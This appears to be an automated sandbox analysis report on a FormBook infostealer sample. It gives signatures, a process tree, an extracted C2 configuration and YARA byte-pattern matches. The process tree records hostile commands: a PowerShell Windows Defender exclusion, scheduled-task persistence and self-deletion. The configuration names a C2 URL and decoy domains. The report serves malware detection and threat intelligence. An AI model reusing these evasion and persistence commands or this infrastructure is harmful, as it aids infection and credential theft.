Edit tour

Windows Analysis Report
890983726372673.exe

Overview

General Information

Sample name:	890983726372673.exe
Analysis ID:	1595232
MD5:	0c883414fcda149f14bfe37c2bd9fc79
SHA1:	cf99ca86cfac68a7414ce261bdbc04263de1ee77
SHA256:	2040a0fdd0eddf11176cddce8489b0906e9bb6ed39b2c825f883e26a3309db57
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a Windows Living Off The Land Binaries (LOL bins)

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

890983726372673.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\890983726372673.exe" MD5: 0C883414FCDA149F14BFE37C2BD9FC79)

powershell.exe (PID: 6692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7240 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6380 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7180 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 7452 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)

cmd.exe (PID: 7608 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmstp.exe (PID: 7588 cmdline: "C:\Windows\SysWOW64\cmstp.exe" MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)

mZanCtInfW.exe (PID: 7364 cmdline: C:\Users\user\AppData\Roaming\mZanCtInfW.exe MD5: 0C883414FCDA149F14BFE37C2BD9FC79)

schtasks.exe (PID: 7488 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpCC47.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7540 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ok33r.shop/3nop/"], "decoy": ["subur88wap.sbs", "tyai1.top", "skillbeast.site", "kcclassiccars.net", "lghomes.net", "eijanno.cyou", "work-in-usa-60100.bond", "268chill.store", "bharatwin.biz", "cakjitu01.xyz", "misafert.xyz", "hiretemp.net", "lvekz-onearmed.top", "amanda-manopo.info", "seo-companies22.online", "casinowalletth.net", "maynrson.monster", "bewizi.com", "thedronetechhub.shop", "car-insurance-93947.bond", "javabits.net", "dzcodelab.xyz", "adeelrao.online", "amazing-cruise-pakages.today", "wftoutsource.services", "stormbeauty.online", "a8dz7m5.com", "875capehornrdjeffersonny.com", "odadesign.site", "reejunkremoval7.life", "g59q18eq.top", "wk0003.top", "rtpradar138af.xyz", "wnsyl11.vip", "nexilis.rest", "top-dubai-cruise-deals.today", "zoril.lol", "englishmaterials.net", "uzumluescortg.xyz", "dutchpay.net", "visprintdesign.biz", "kneepain661.shop", "xuq-smart-fridge-uj0.rest", "jam-nins.com", "rentabay.shop", "victoryvo2.info", "i2c2.tech", "wck37.top", "refrigerators-69792.bond", "abc1network.net", "amilia-do-gil.net", "806477628.xyz", "luxdrive.vip", "unika.lat", "sculptify.today", "winatwork.today", "onlinegamehub.online", "petnino.club", "amtrade.icu", "macular-degeneration-39252.bond", "argastipster.click", "1nvuti.fun", "beautifyaura.com", "savings-accounts-57645.bond"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6959:$a1: 3C 30 50 4F 53 54 74 09 40 0x34d79:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d288:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4b6a8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb0c7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x394e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15faf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x443cf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa010:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa27a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38430:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3869a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15dad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x441cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15899:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x43cb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15eaf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x442cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16027:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x44447:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xac92:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x390b2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14b14:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x42f34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb98b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x39dab:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bfef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x4a40f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cff2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18f11:$sqlite3step: 68 34 1C 7B E1 0x19024:$sqlite3step: 68 34 1C 7B E1 0x47331:$sqlite3step: 68 34 1C 7B E1 0x47444:$sqlite3step: 68 34 1C 7B E1 0x18f40:$sqlite3text: 68 38 2A 90 C5 0x19065:$sqlite3text: 68 38 2A 90 C5 0x47360:$sqlite3text: 68 38 2A 90 C5 0x47485:$sqlite3text: 68 38 2A 90 C5 0x18f53:$sqlite3blob: 68 53 D8 7F 8C 0x1907b:$sqlite3blob: 68 53 D8 7F 8C 0x47373:$sqlite3blob: 68 53 D8 7F 8C 0x4749b:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6999:$a1: 3C 30 50 4F 53 54 74 09 40 0x34db9:$a1: 3C 30 50 4F 53 54 74 09 40 0x621d9:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d2c8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4b6e8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x78b08:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb107:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x39527:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x66947:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15fef:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x4440f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x7182f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa050:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa2ba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38470:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x386da:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65890:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65afa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15ded:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4420d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7162d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x158d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x43cf9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x71119:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15eef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4430f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7172f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16067:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x44487:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x718a7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xacd2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x390f2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x66512:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18f51:$sqlite3step: 68 34 1C 7B E1 0x19064:$sqlite3step: 68 34 1C 7B E1 0x47371:$sqlite3step: 68 34 1C 7B E1 0x47484:$sqlite3step: 68 34 1C 7B E1 0x74791:$sqlite3step: 68 34 1C 7B E1 0x748a4:$sqlite3step: 68 34 1C 7B E1 0x18f80:$sqlite3text: 68 38 2A 90 C5 0x190a5:$sqlite3text: 68 38 2A 90 C5 0x473a0:$sqlite3text: 68 38 2A 90 C5 0x474c5:$sqlite3text: 68 38 2A 90 C5 0x747c0:$sqlite3text: 68 38 2A 90 C5 0x748e5:$sqlite3text: 68 38 2A 90 C5 0x18f93:$sqlite3blob: 68 53 D8 7F 8C 0x190bb:$sqlite3blob: 68 53 D8 7F 8C 0x473b3:$sqlite3blob: 68 53 D8 7F 8C 0x474db:$sqlite3blob: 68 53 D8 7F 8C 0x747d3:$sqlite3blob: 68 53 D8 7F 8C 0x748fb:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5749:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c078:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9eb7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14d9f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8e00:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x906a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14b9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14689:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14c9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14e17:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9a82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13904:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa77b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1addf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bde2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17d01:$sqlite3step: 68 34 1C 7B E1 0x17e14:$sqlite3step: 68 34 1C 7B E1 0x17d30:$sqlite3text: 68 38 2A 90 C5 0x17e55:$sqlite3text: 68 38 2A 90 C5 0x17d43:$sqlite3blob: 68 53 D8 7F 8C 0x17e6b:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.2562036289.0000000010545000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xb02:$a2: pass 0xb08:$a3: email 0xb0f:$a4: login 0xb16:$a5: signin 0xb27:$a6: persistent 0xcfa:$r1: C:\Users\user\AppData\Roaming\3348O044\334log.ini
0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
